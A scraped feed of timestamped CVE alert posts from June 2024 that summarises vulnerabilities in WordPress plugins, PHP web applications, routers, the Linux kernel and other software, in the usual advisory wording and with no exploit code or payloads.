| 2024-06-09 11:37:30 |
🚨 CVE-2024-30465Missing Authorization vulnerability in Pagelayer Team PageLayer.This issue affects PageLayer: from n/a through 1.8.1.🎖@cveNotify |
|
| 2024-06-09 11:37:26 |
🚨 CVE-2024-25929Missing Authorization vulnerability in MultiVendorX Product Catalog Enquiry for WooCommerce by MultiVendorX.This issue affects Product Catalog Enquiry for WooCommerce by MultiVendorX: from n/a through 5.0.5.🎖@cveNotify |
|
| 2024-06-09 11:37:25 |
🚨 CVE-2024-24716Missing Authorization vulnerability in Awesome Support Team Awesome Support.This issue affects Awesome Support: from n/a through 6.1.6.🎖@cveNotify |
|
| 2024-06-09 11:37:24 |
🚨 CVE-2023-34003Missing Authorization vulnerability in Woo WooCommerce Box Office.This issue affects WooCommerce Box Office: from n/a through 1.1.51.🎖@cveNotify |
|
| 2024-06-09 10:37:25 |
🚨 CVE-2023-23640Missing Authorization vulnerability in MainWP MainWP UpdraftPlus Extension.This issue affects MainWP UpdraftPlus Extension: from n/a through 4.0.6.🎖@cveNotify |
|
| 2024-06-09 10:37:24 |
🚨 CVE-2023-23639Missing Authorization vulnerability in MainWP MainWP Staging Extension.This issue affects MainWP Staging Extension: from n/a through 4.0.3.🎖@cveNotify |
|
| 2024-06-09 08:37:24 |
🚨 CVE-2024-5775A vulnerability was found in SourceCodester Vehicle Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file updatebill.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-267458 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-09 06:37:24 |
🚨 CVE-2024-5774A vulnerability has been found in SourceCodester Stock Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file index.php of the component Login. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-267457 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-09 03:37:25 |
🚨 CVE-2024-5773A vulnerability, which was classified as critical, was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected is an unknown function of the file /protocol/firewall/deletemacbind.php. The manipulation of the argument messagecontent leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267456. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-09 03:37:24 |
🚨 CVE-2024-5772A vulnerability, which was classified as critical, has been found in Netentsec NS-ASG Application Security Gateway 6.3. This issue affects some unknown processing of the file /protocol/iscuser/deleteiscuser.php. The manipulation of the argument messagecontent leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267455. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-08 22:37:24 |
🚨 CVE-2024-5771A vulnerability classified as critical was found in LabVantage LIMS 2017. This vulnerability affects unknown code of the file /labvantage/rc?command=page&page=SampleList&_iframename=list of the component POST Request Handler. The manipulation of the argument param1 leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-267454 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-08 20:37:25 |
🚨 CVE-2024-4146In lunary-ai/lunary version v1.2.13, an improper authorization vulnerability exists that allows unauthorized users to access and manipulate projects within an organization they should not have access to. Specifically, the vulnerability is located in the `checkProjectAccess` method within the authorization middleware, which fails to adequately verify if a user has the correct permissions to access a specific project. Instead, it only checks if the user is part of the organization owning the project, overlooking the necessary check against the `account_project` table for explicit project access rights. This flaw enables attackers to gain complete control over all resources within a project, including the ability to create, update, read, and delete any resource, compromising the privacy and security of sensitive information.🎖@cveNotify |
|
| 2024-06-08 17:37:25 |
🚨 CVE-2024-22151Missing Authorization vulnerability in Codection Import and export users and customers.This issue affects Import and export users and customers: from n/a through 1.24.6.🎖@cveNotify |
|
| 2024-06-08 17:37:24 |
🚨 CVE-2024-21748Missing Authorization vulnerability in Icegram.This issue affects Icegram: from n/a through 3.1.21.🎖@cveNotify |
|
| 2024-06-08 16:37:27 |
🚨 CVE-2024-35678Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BestWebSoft Contact Form to DB by BestWebSoft.This issue affects Contact Form to DB by BestWebSoft: from n/a through 1.7.2.🎖@cveNotify |
|
| 2024-06-08 16:37:26 |
🚨 CVE-2024-35675Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in ILLID Advanced Woo Labels allows Cross-Site Scripting (XSS).This issue affects Advanced Woo Labels: from n/a through 1.93.🎖@cveNotify |
|
| 2024-06-08 16:37:25 |
🚨 CVE-2024-35659Authorization Bypass Through User-Controlled Key vulnerability in KiviCare.This issue affects KiviCare: from n/a through 3.6.2.🎖@cveNotify |
|
| 2024-06-08 16:37:24 |
🚨 CVE-2024-35657Cross-Site Request Forgery (CSRF) vulnerability in Plechev Andrey WP-Recall.This issue affects WP-Recall: from n/a through 16.26.6.🎖@cveNotify |
|
| 2024-06-08 15:37:45 |
🚨 CVE-2024-35703Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SinaExtra Sina Extension for Elementor allows Stored XSS.This issue affects Sina Extension for Elementor: from n/a through 3.5.3.🎖@cveNotify |
|
| 2024-06-08 15:37:44 |
🚨 CVE-2024-35701Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in PropertyHive allows Stored XSS.This issue affects PropertyHive: from n/a through 2.0.13.🎖@cveNotify |
|
| 2024-06-08 15:37:43 |
🚨 CVE-2024-35698Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in YITH YITH WooCommerce Tab Manager allows Stored XSS.This issue affects YITH WooCommerce Tab Manager: from n/a through 1.35.0.🎖@cveNotify |
|
| 2024-06-08 15:37:39 |
🚨 CVE-2024-35697Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in ThimPress Eduma allows Reflected XSS.This issue affects Eduma: from n/a through 5.4.7.🎖@cveNotify |
|
| 2024-06-08 15:37:38 |
🚨 CVE-2024-35695Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Fahad Mahmood WP Docs allows Stored XSS.This issue affects WP Docs: from n/a through 2.1.3.🎖@cveNotify |
|
| 2024-06-08 15:37:37 |
🚨 CVE-2024-35693Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Code for Recovery 12 Step Meeting List allows Reflected XSS.This issue affects 12 Step Meeting List: from n/a through 3.14.33.🎖@cveNotify |
|
| 2024-06-08 15:37:32 |
🚨 CVE-2024-35689Cross-Site Request Forgery (CSRF) vulnerability in Analytify.This issue affects Analytify: from n/a through 5.2.3.🎖@cveNotify |
|
| 2024-06-08 15:37:31 |
🚨 CVE-2024-35687Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Yannick Lefebvre Link Library link-library allows Reflected XSS.This issue affects Link Library: from n/a through 7.6.3.🎖@cveNotify |
|
| 2024-06-08 15:37:30 |
🚨 CVE-2024-35684Cross-Site Request Forgery (CSRF) vulnerability in 10up ElasticPress.This issue affects ElasticPress: from n/a through 5.1.0.🎖@cveNotify |
|
| 2024-06-08 15:37:26 |
🚨 CVE-2024-35679Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in GiveWP allows Reflected XSS.This issue affects GiveWP: from n/a through 3.12.0.🎖@cveNotify |
|
| 2024-06-08 15:37:25 |
🚨 CVE-2024-34765Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Sensei Sensei Pro (WC Paid Courses) allows Stored XSS.This issue affects Sensei Pro (WC Paid Courses): from n/a through 4.23.1.1.23.1.🎖@cveNotify |
|
| 2024-06-08 15:37:24 |
🚨 CVE-2023-45707HCL Connections Docs is vulnerable to a cross-site scripting attack where an attacker may leverage this issue to execute arbitrary code. This may lead to credentials disclosure and possibly launch additional attacks.🎖@cveNotify |
|
| 2024-06-08 14:37:37 |
🚨 CVE-2024-37408fprintd through 1.94.3 lacks a security attention mechanism, and thus unexpected actions might be authorized by "auth sufficient pam_fprintd.so" for Sudo.🎖@cveNotify |
|
| 2024-06-08 14:37:33 |
🚨 CVE-2024-35719Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in MagniGenie RestroPress allows Stored XSS.This issue affects RestroPress: from n/a through 3.1.2.1.🎖@cveNotify |
|
| 2024-06-08 14:37:32 |
🚨 CVE-2024-35715Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Peregrine themes Bloglo allows Stored XSS.This issue affects Bloglo: from n/a through 1.1.3.🎖@cveNotify |
|
| 2024-06-08 14:37:31 |
🚨 CVE-2024-35714Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Theme Freesia Idyllic allows Stored XSS.This issue affects Idyllic: from n/a through 1.1.8.🎖@cveNotify |
|
| 2024-06-08 14:37:30 |
🚨 CVE-2024-35713Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in UAPP GROUP Testimonial Carousel For Elementor allows Stored XSS.This issue affects Testimonial Carousel For Elementor: from n/a through 10.1.1.🎖@cveNotify |
|
| 2024-06-08 14:37:27 |
🚨 CVE-2024-35711Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Theme Freesia Event allows Stored XSS.This issue affects Event: from n/a through 1.2.2.🎖@cveNotify |
|
| 2024-06-08 14:37:26 |
🚨 CVE-2024-35710Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Podlove Podlove Web Player.This issue affects Podlove Web Player: from n/a through 5.7.3.🎖@cveNotify |
|
| 2024-06-08 14:37:25 |
🚨 CVE-2024-35708Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in apollo13themes Rife Free allows Stored XSS.This issue affects Rife Free: from n/a through 2.4.19.🎖@cveNotify |
|
| 2024-06-08 14:37:24 |
🚨 CVE-2024-35707Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Team Heateor Heateor Social Login allows Stored XSS.This issue affects Heateor Social Login: from n/a through 1.1.32.🎖@cveNotify |
|
| 2024-06-08 13:37:44 |
🚨 CVE-2024-36965In the Linux kernel, the following vulnerability has been resolved:remoteproc: mediatek: Make sure IPI buffer fits in L2TCMThe IPI buffer location is read from the firmware that we load to theSystem Companion Processor, and it's not granted that both the SRAM(L2TCM) size that is defined in the devicetree node is large enoughfor that, and while this is especially true for multi-core SCP, it'sstill useful to check on single-core variants as well.Failing to perform this check may make this driver perform R/Woperations out of the L2TCM boundary, resulting (at best) in akernel panic.To fix that, check that the IPI buffer fits, otherwise return afailure and refuse to boot the relevant SCP core (or the SCP atall, if this is single core).🎖@cveNotify |
|
| 2024-06-08 13:37:43 |
🚨 CVE-2024-35752Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Enea Overclokk Stellissimo Text Box allows Stored XSS.This issue affects Stellissimo Text Box: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-06-08 13:37:39 |
🚨 CVE-2024-35751Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Creative Motion, Will Bontrager Software, LLC Woody ad snippets allows Stored XSS.This issue affects Woody ad snippets: from n/a through 2.4.10.🎖@cveNotify |
|
| 2024-06-08 13:37:38 |
🚨 CVE-2024-35740Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Theme Freesia Pixgraphy allows Stored XSS.This issue affects Pixgraphy: from n/a through 1.3.8.🎖@cveNotify |
|
| 2024-06-08 13:37:37 |
🚨 CVE-2024-35739Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in RadiusTheme The Post Grid allows Stored XSS.This issue affects The Post Grid: from n/a through 7.7.1.🎖@cveNotify |
|
| 2024-06-08 13:37:36 |
🚨 CVE-2024-35738Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Kognetiks Kognetiks Chatbot for WordPress allows Stored XSS.This issue affects Kognetiks Chatbot for WordPress: from n/a through 1.9.8.🎖@cveNotify |
|
| 2024-06-08 13:37:33 |
🚨 CVE-2024-35737Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Loopus WP Visitors Tracker allows Reflected XSS.This issue affects WP Visitors Tracker: from n/a through 2.3.🎖@cveNotify |
|
| 2024-06-08 13:37:32 |
🚨 CVE-2024-35734Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CodePeople WP Time Slots Booking Form allows Stored XSS.This issue affects WP Time Slots Booking Form: from n/a through 1.2.10.🎖@cveNotify |
|
| 2024-06-08 13:37:31 |
🚨 CVE-2024-35732Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in YITH YITH Custom Login allows Stored XSS.This issue affects YITH Custom Login: from n/a through 1.7.0.🎖@cveNotify |
|
| 2024-06-08 13:37:27 |
🚨 CVE-2024-35731Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Moose Kenta Gutenberg Blocks Responsive Blocks and block templates library for Gutenberg Editor allows Stored XSS.This issue affects Kenta Gutenberg Blocks Responsive Blocks and block templates library for Gutenberg Editor: from n/a through 1.3.9.🎖@cveNotify |
|
| 2024-06-08 13:37:26 |
🚨 CVE-2024-35730Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in realmag777 Active Products Tables for WooCommerce allows Reflected XSS.This issue affects Active Products Tables for WooCommerce: from n/a through 1.0.6.3.🎖@cveNotify |
|
| 2024-06-08 13:37:25 |
🚨 CVE-2024-20697Windows Libarchive Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-08 13:37:24 |
🚨 CVE-2024-20696Windows Libarchive Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-08 11:37:25 |
🚨 CVE-2024-35755Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in El tiempo Weather Widget Pro allows Stored XSS.This issue affects Weather Widget Pro: from n/a through 1.1.40.🎖@cveNotify |
|
| 2024-06-08 11:37:24 |
🚨 CVE-2024-35753Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TemplatesNext TemplatesNext OnePager allows Stored XSS.This issue affects TemplatesNext OnePager: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-06-08 09:37:24 |
🚨 CVE-2024-5654The CF7 Google Sheets Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'execute_post_data_cg7_free' function in all versions up to, and including, 5.0.9. This makes it possible for unauthenticated attackers to toggle site configuration settings, including WP_DEBUG, WP_DEBUG_LOG, SCRIPT_DEBUG, and SAVEQUERIES.🎖@cveNotify |
|
| 2024-06-08 08:37:24 |
🚨 CVE-2024-4468The Salon booking system plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on several functions hooked into admin_init in all versions up to, and including, 9.9. This makes it possible for authenticated attackers with subscriber access or higher to modify plugin settings and view discount codes intended for other users.🎖@cveNotify |
|
| 2024-06-08 07:37:25 |
🚨 CVE-2024-5758The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the filterMobileText parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-08 07:37:24 |
🚨 CVE-2024-5091The SKT Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Age Gate and Creative Slider widgets in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-08 06:37:26 |
🚨 CVE-2024-5638The Formula theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in the 'ti_customizer_notify_dismiss_recommended_plugins' AJAX action in all versions up to, and including, 0.5.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-08 06:37:25 |
🚨 CVE-2024-5087The Minimal Coming Soon – Coming Soon Page plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the validate_ajax, deactivate_ajax, and save_ajax functions in all versions up to, and including, 2.38. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit the license key, which could disable features of the plugin.🎖@cveNotify |
|
| 2024-06-08 06:37:24 |
🚨 CVE-2024-4661The WP Reset plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_ajax function in all versions up to, and including, 2.02. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the value fo the 'License Key' field for the 'Activate Pro License' setting.🎖@cveNotify |
|
| 2024-06-08 05:37:25 |
🚨 CVE-2024-5770The WP Force SSL & HTTPS SSL Redirect plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_setting' function in versions up to, and including, 1.66. This makes it possible for authenticated attackers, subscriber-level permissions and above, to update the plugin settings.🎖@cveNotify |
|
| 2024-06-08 05:37:24 |
🚨 CVE-2024-3668The PowerPack Pro for Elementor plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.10.17. This is due to the plugin not restricting low privileged users from setting a default role for a registration form. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with administrator set as the default role and then register as an administrator.🎖@cveNotify |
|
| 2024-06-08 04:37:24 |
🚨 CVE-2024-5745A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/modules/product/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-267414 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-08 03:37:24 |
🚨 CVE-2024-5663The Cards for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Cards widget in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-07 23:37:25 |
🚨 CVE-2024-0444GStreamer AV1 Video Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.The specific flaw exists within the parsing of tile list data within AV1-encoded video files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22873.🎖@cveNotify |
|
| 2024-06-07 21:37:24 |
🚨 CVE-2024-5745A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/modules/product/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-267414 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 20:37:36 |
🚨 CVE-2023-49224Precor touchscreen console P62, P80, and P82 contains a default SSH public key in the authorized_keys file. A remote attacker could use this key to gain root privileges.🎖@cveNotify |
|
| 2024-06-07 20:37:32 |
🚨 CVE-2023-49223Precor touchscreen console P62, P80, and P82 could allow a remote attacker to obtain sensitive information because the root password is stored in /etc/passwd. An attacker could exploit this to extract files and obtain sensitive information.🎖@cveNotify |
|
| 2024-06-07 20:37:31 |
🚨 CVE-2024-5391A vulnerability has been found in itsourcecode Online Student Enrollment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file listofsubject.php. The manipulation of the argument subjcode leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266305 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 20:37:30 |
🚨 CVE-2024-5378A vulnerability was found in SourceCodester School Intramurals Student Attendance Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /manage_sy.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-266290 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 20:37:26 |
🚨 CVE-2024-5357A vulnerability has been found in PHPGurukul Zoo Management System 2.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/forgot-password.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266269 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 20:37:25 |
🚨 CVE-2024-4903A vulnerability was found in Tongda OA 2017. It has been declared as critical. This vulnerability affects unknown code of the file /general/meeting/manage/delete.php. The manipulation of the argument M_ID_STR leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264436. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-07 20:37:24 |
🚨 CVE-2024-2575A vulnerability, which was classified as critical, has been found in SourceCodester Employee Task Management System 1.0. Affected by this issue is some unknown functionality of the file /task-details.php. The manipulation of the argument task_id leads to authorization bypass. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257078 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 18:37:25 |
🚨 CVE-2024-5745A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/modules/product/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-267414 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 18:37:24 |
🚨 CVE-2009-10003A vulnerability was found in capnsquarepants wordcraft up to 0.6. It has been classified as problematic. Affected is an unknown function of the file tag.php. The manipulation of the argument tag leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 0.7 is able to address this issue. The patch is identified as be23028633e8105de92f387036871c03f34d3124. It is recommended to upgrade the affected component. VDB-219714 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 18:07:24 |
🚨 CVE-2024-21835Insecure inherited permissions in some Intel(R) XTU software before version 7.14.0.15 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-06-07 16:37:25 |
🚨 CVE-2024-27622A remote code execution vulnerability has been identified in the User Defined Tags module of CMS Made Simple version 2.2.19. This vulnerability arises from inadequate sanitization of user-supplied input in the 'Code' section of the module. As a result, authenticated users with administrative privileges can inject and execute arbitrary PHP code.🎖@cveNotify |
|
| 2024-06-07 16:37:24 |
🚨 CVE-2024-24399An arbitrary file upload vulnerability in LEPTON v7.0.0 allows authenticated attackers to execute arbitrary PHP code by uploading this code to the backend/languages/index.php languages area.🎖@cveNotify |
|
| 2024-06-07 16:07:24 |
🚨 CVE-2024-4058Type confusion in ANGLE in Google Chrome prior to 124.0.6367.78 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2024-06-07 15:37:33 |
🚨 CVE-2024-37162zsa is a library for building typesafe server actions in Next.js. All users are impacted. The zsa application transfers the parse error stack from the server to the client in production build mode. This can potentially reveal sensitive information about the server environment, such as the machine username and directory paths. An attacker could exploit this vulnerability to gain unauthorized access to sensitive server information. This information could be used to plan further attacks or gain a deeper understanding of the server infrastructure. This has been patched on `0.3.3`.🎖@cveNotify |
|
| 2024-06-07 15:37:32 |
🚨 CVE-2024-36790Netgear WNR614 JNR1010V2/N300-V1.1.0.54_1.0.1 was discovered to store credentials in plaintext.🎖@cveNotify |
|
| 2024-06-07 15:37:31 |
🚨 CVE-2024-36789An issue in Netgear WNR614 JNR1010V2/N300-V1.1.0.54_1.0.1 allows attackers to create passwords that do not conform to defined security standards.🎖@cveNotify |
|
| 2024-06-07 15:37:30 |
🚨 CVE-2024-36788Netgear WNR614 JNR1010V2 N300-V1.1.0.54_1.0.1 does not properly set the HTTPOnly flag for cookies. This allows attackers to possibly intercept and access sensitive communications between the router and connected devices.🎖@cveNotify |
|
| 2024-06-07 15:37:27 |
🚨 CVE-2024-36787An issue in Netgear WNR614 JNR1010V2 N300-V1.1.0.54_1.0.1 allows attackers to bypass authentication and access the administrative interface via unspecified vectors.🎖@cveNotify |
|
| 2024-06-07 15:37:26 |
🚨 CVE-2024-5732A vulnerability was found in Clash up to 0.20.1 on Windows. It has been declared as critical. This vulnerability affects unknown code of the component Proxy Port. The manipulation leads to improper authentication. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. VDB-267406 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-07 15:37:25 |
🚨 CVE-2024-24520An issue in Lepton CMS v.7.0.0 allows a local attacker to execute arbitrary code via the upgrade.php file in the languages place.🎖@cveNotify |
|
| 2024-06-07 15:37:24 |
🚨 CVE-2024-25415A remote code execution (RCE) vulnerability in /admin/define_language.php of CE Phoenix v1.0.8.20 allows attackers to execute arbitrary PHP code via injecting a crafted payload into the file english.php.🎖@cveNotify |
|
| 2024-06-07 15:07:44 |
🚨 CVE-2024-36745An issue in OneFlow-Inc. Oneflow v0.9.1 allows attackers to cause a Denial of Service (DoS) via inputting a negative value into the oneflow.index_select parameter.🎖@cveNotify |
|
| 2024-06-07 15:07:43 |
🚨 CVE-2024-36737Improper input validation in OneFlow-Inc. Oneflow v0.9.1 allows attackers to cause a Denial of Service (DoS) via inputting a negative value into the oneflow.full parameter.🎖@cveNotify |
|
| 2024-06-07 15:07:42 |
🚨 CVE-2024-36736An issue in the oneflow.permute component of OneFlow-Inc. Oneflow v0.9.1 causes an incorrect calculation when the same dimension operation is performed.🎖@cveNotify |
|
| 2024-06-07 15:07:39 |
🚨 CVE-2024-30375Luxion KeyShot Viewer KSP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of KSP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22515.🎖@cveNotify |
|
| 2024-06-07 15:07:38 |
🚨 CVE-2024-30369A10 Thunder ADC Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of A10 Thunder ADC. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the installer. The issue results from incorrect permissions on a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-22754.🎖@cveNotify |
|
| 2024-06-07 15:07:37 |
🚨 CVE-2024-2914A TarSlip vulnerability exists in the deepjavalibrary/djl, affecting version 0.26.0 and fixed in version 0.27.0. This vulnerability allows an attacker to manipulate file paths within tar archives to overwrite arbitrary files on the target system. Exploitation of this vulnerability could lead to remote code execution, privilege escalation, data theft or manipulation, and denial of service. The vulnerability is due to improper validation of file paths during the extraction of tar files, as demonstrated in multiple occurrences within the library's codebase, including but not limited to the files_util.py and extract_imagenet.py scripts.🎖@cveNotify |
|
| 2024-06-07 15:07:33 |
🚨 CVE-2024-1879A Cross-Site Request Forgery (CSRF) vulnerability in significant-gravitas/autogpt version v0.5.0 allows attackers to execute arbitrary commands on the AutoGPT server. The vulnerability stems from the lack of protections on the API endpoint receiving instructions, enabling an attacker to direct a user running AutoGPT in their local network to a malicious website. This site can then send crafted requests to the AutoGPT server, leading to command execution. The issue is exacerbated by CORS being enabled for arbitrary origins by default, allowing the attacker to read the response of all cross-site queries. This vulnerability was addressed in version 5.1.🎖@cveNotify |
|
| 2024-06-07 15:07:32 |
🚨 CVE-2024-33655The DNS protocol in RFC 1035 and updates allows remote attackers to cause a denial of service (resource consumption) by arranging for DNS queries to be accumulated for seconds, such that responses are later sent in a pulsing burst (which can be considered traffic amplification in some cases), aka the "DNSBomb" issue.🎖@cveNotify |
|
| 2024-06-07 15:07:31 |
🚨 CVE-2024-37152Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern. This vulnerability is fixed in 2.11.3, 2.10.12, and 2.9.17.🎖@cveNotify |
|
| 2024-06-07 15:07:27 |
🚨 CVE-2024-36399Kanboard is project management software that focuses on the Kanban methodology. The vuln is in app/Controller/ProjectPermissionController.php function addUser(). The users permission to add users to a project only get checked on the URL parameter project_id. If the user is authorized to add users to this project the request gets processed. The users permission for the POST BODY parameter project_id does not get checked again while processing. An attacker with the 'Project Manager' on a single project may take over any other project. The vulnerability is fixed in 1.2.37.🎖@cveNotify |
|
| 2024-06-07 15:07:26 |
🚨 CVE-2024-36106Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. It’s possible for authenticated users to enumerate clusters by name by inspecting error messages. It’s also possible to enumerate the names of projects with project-scoped clusters if you know the names of the clusters. This vulnerability is fixed in 2.11.3, 2.10.12, and 2.9.17.🎖@cveNotify |
|
| 2024-06-07 15:07:25 |
